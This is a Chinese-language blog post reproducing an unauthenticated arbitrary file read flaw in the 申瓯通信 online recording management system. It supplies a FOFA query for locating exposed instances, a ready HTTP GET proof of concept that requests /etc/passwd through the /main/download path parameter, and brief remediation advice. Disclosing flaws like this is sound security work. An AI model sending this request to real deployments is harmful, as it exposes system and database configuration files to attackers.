首页 > 其他分享 >申瓯通信 在线录音管理系统 download 任意文件读取漏洞复现

申瓯通信 在线录音管理系统 download 任意文件读取漏洞复现

时间:2024-06-17 12:30:31浏览次数:18  
标签:配置文件 管理系统 录音 漏洞 申瓯 复现 download

0x01 产品简介

申瓯通信在线录音管理系统是一款功能强大的录音管理解决方案,旨在满足公司、集团单位在区域分布下对录音数据的集中管理需求。该系统基于SOC1900、SOC1600等系列录音盒开发,是一个多线路、多设备、多区域的录音统一管理平台。该系统将各个分点的录音盒的录音统一集中到服务器,便于总部人员快速查看和管理,从而提升企事业单位的服务质量和管理效率。

0x02 漏洞概述

申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:title="在线录音管理系统"

0x04 漏洞复现 

PoC

GET /main/download?path=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

标签:配置文件,管理系统,录音,漏洞,申瓯,复现,download
From: https://blog.csdn.net/qq_41904294/article/details/139739474

相关文章

  • 致远互联FE协作办公平台 ncsubjass SQL注入致RCE漏洞复现
    0x01产品简介致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。0x02漏洞概述致远互联FE协作办公平台ncsubjass.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过......
  • 基于知识图谱的古诗词问答系统(全网首份 + 包复现 + 理论篇)
    目录一、前言二、问答系统架构三、系统处理模块3.1系统注册与登录3.2数据交互四、古诗词知识图谱模块4.1数据获取与处理4.2知识表示与建模4.3知识抽取与挖掘4.4知识存储与融合4.5知识检索与推理五、问答交互模块5.1系统注册与登录六、问句解析模块6.1意图......
  • R3CTF NinjaClub复现
    R3CTFNinjaClubjinjia2沙箱题目源码fromjinja2.sandboximportSandboxedEnvironment,is_internal_attributefromjinja2.exceptionsimportUndefinedErrorfromfastapiimportFastAPI,Formfromfastapi.responsesimportHTMLResponsefrompydanticimportBaseMod......
  • 长城杯CTF2024-PWN-kawayi复现
    文件保护libc版本uaf漏洞free函数没有进行置0操作GDB断点断点:0xD90泄漏libc由于v1>3会退出,所以必须在四次申请堆块中拿到shell第一次申请-创建largebinchunk因为创建largebin的chunk堆块,所以申请的是0x430第二次申请-创建tcachebinchunk申请一个tcache......
  • fastjson(版本<=1.2.24)复现
    文章目录1.啥是JSON介绍:2.啥是fastjson?3.fastjson序列化/反序列化原理4.fastjson反序列化漏洞原理$复现流程:漏洞影响范围:fastjson<=1.2.24一、漏洞环境搭建二、漏洞验证方法一三、漏洞验证方法二1.啥是JSON介绍:JSON,全称:JavaScriptObjectNotation,作为一个常见的......
  • Vulhub WebLogic漏洞复现
    目录前言任意文件上传漏洞(CVE-2018-2894)管理控制台未授权RCE漏洞(CVE-2020-14882&CVE-2020-14883)未授权RCE漏洞(CVE-2023-21839)SSRF漏洞(CVE-2014-4210)前言前面两篇针对WebLogic存在的XMLDecoder和T3协议反序列化漏洞进行了分析和复现,这里继续借助vulhub来复现WebLogic的其他漏洞......
  • 红日复现为什么失败之struct漏洞复现
    struts2漏洞一、指纹识别s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。方法一(1)url会有.action或.do后缀文件名(eg:http://192.168.xx.xx/integ......
  • CSRF漏洞复现及测试工具讲解
    一、Python编写一个存在CSRF漏洞①编写html网页<!DOCTYPEhtml><html><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width,initial-scale=1.0"><title>转账</title......
  • 论文复现---BeatGAN
    论文复现---BeatGAN原创 小王搬运工 时序课堂 2024-06-1110:02 四川BeatGAN:AnomalousRhythmDetectionusingAdversariallyGeneratedTime SeriesBeatGAN:使用对抗生成时间序列的异常心律检测https://github.com/Vniex/BeatGANPyTorch(1.0.0)scikit......
  • CISCN2024 初赛 wp 部分复现(Re)
    Misc1.火锅链观光打卡答题即可Re1.asm_re感谢智谱清言,可以读出大致加密算法这是输入这是加密部分这里判断找到疑似密文的部分,手动改一下端序#asm_wpdefdec(char):return(((char-0x1E)^0x4D)-0x14)//0x50#return(ord(char)*0x50+0......